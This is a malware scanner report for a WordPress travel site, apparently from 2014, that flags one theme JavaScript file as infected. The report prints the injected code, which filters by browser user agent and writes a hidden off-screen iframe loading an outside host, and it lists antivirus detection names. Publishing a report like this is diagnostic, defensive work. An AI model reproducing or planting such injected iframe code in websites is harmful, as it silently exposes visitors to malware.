Malware Scanner report for turistos-master.ru

Malicious/Suspicious/Total urls checked: 1/0/15
1 page has malicious code. See details below.
Blacklists: OK
Malicious Redirects: OK
Malicious/Hidden/Total iFrames: 0/0/0
Deface / Content modification: OK

Scanned pages/files

Request / Server response / Status
http://turistos-master.ru/
200 OK
Content-Length: 55601
Content-Type: text/html
clean
http://turistos-master.ru/wp-content/themes/tree-house/dhtml.js
200 OK
Content-Length: 2255
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ffff_listier_ua(){
var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire
... 1330 bytes are skipped ...
" name="Anatoli"></'+'ifr'+'ame>');
}
}
})();
navHover = function()
{
var lis = document.getElementById("nav").getElementsByTagName("LI");
for (var i=0; i<lis.length; i++) {
lis[i].onmouseover=function() {
this.className+=" iehover";
}
lis[i].onmouseout=function() {
this.className=this.className.replace(new RegExp(" iehover\\b"), "");
}
}
}
if (window.attachEvent) window.attachEvent("onload", navHover);

Decoded script:


function () {
var lis = document.getElementById("nav").getElementsByTagName("LI");
for (var i = 0; i < lis.length; i++) {
lis[i].onmouseover = function () {this.className += " iehover";};
lis[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" iehover\\b"), "");};
}
}
<iframe src="http://scsczero.hycrete.com.br/jtrsdhtrjtydkytk8.html" style="position:absolute;left:-1309px;top:-1309px;" height="175" width="175" name="Anatoli"></iframe>

Antivirus reports:

Avast      JS:Iframe-EHG [Trj]
DrWeb      JS.IFrame.566
Microsoft  Trojan:JS/Iframe.DI
Fortinet   JS/IFrame.XX!tr

http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21308
Content-Type: text/javascript
clean
http://turistos-master.ru/?feed=rss2
200 OK
Content-Length: 41019
Content-Type: text/html
clean
http://turistos-master.ru/wp-content/uploads/2013/02/mardi_gras_019.jpg
200 OK
Content-Length: 62716
Content-Type: image/jpeg
clean
http://turistos-master.ru/test404page.js
404 Not Found
Content-Length: 1
Content-Type: text/html
clean
http://turistos-master.ru/wp-content/uploads/2012/12/sydney-aquarium.jpg
200 OK
Content-Length: 228334
Content-Type: image/jpeg
clean
http://turistos-master.ru/wp-content/uploads/2012/12/1271101015_1271084929_1271008531_pink-lake-01.jpg
200 OK
Content-Length: 68229
Content-Type: image/jpeg
clean
http://turistos-master.ru/wp-content/uploads/2012/09/39078737_1233590153_1656.jpg
200 OK
Content-Length: 84628
Content-Type: image/jpeg
clean
http://turistos-master.ru/wp-content/uploads/2012/09/be7b5c4a7132525444394bae0bd7d66b585120111136843.jpg
200 OK
Content-Length: 62374
Content-Type: image/jpeg
clean
http://turistos-master.ru/wp-content/uploads/2012/09/12688929551220717740_0_5.jpg
200 OK
Content-Length: 45215
Content-Type: image/jpeg
clean
http://turistos-master.ru/wp-content/uploads/2012/09/argyle_cove.jpg
200 OK
Content-Length: 91540
Content-Type: image/jpeg
clean
http://turistos-master.ru/wp-content/uploads/2012/09/queen-victoria-building-sydney-ipoh-garden-berhad3.jpg
200 OK
Content-Length: 196138
Content-Type: image/jpeg
clean
http://turistos-master.ru/wp-content/uploads/2012/08/stud.png
200 OK
Content-Length: 300084
Content-Type: image/png
clean
http://turistos-master.ru/wp-content/uploads/2012/08/1.jpg
200 OK
Content-Length: 57625
Content-Type: image/jpeg
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: turistos-master.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Sat, 04 Oct 2014 08:18:34 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 55601
Content-Type: text/html;charset=utf-8
Expires: Tue, 07 Oct 2014 00:00:00 GMT
Last-Modified: Sat, 04 Oct 2014 00:00:00 GMT
X-Powered-By: PHP/5.2.17

...55601 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: turistos-master.ru
Referer: http://www.google.com/search?q=turistos-master.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=turistos-master.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://turistos-master.ru/

Result: turistos-master.ru is not infected or malware details are not published yet.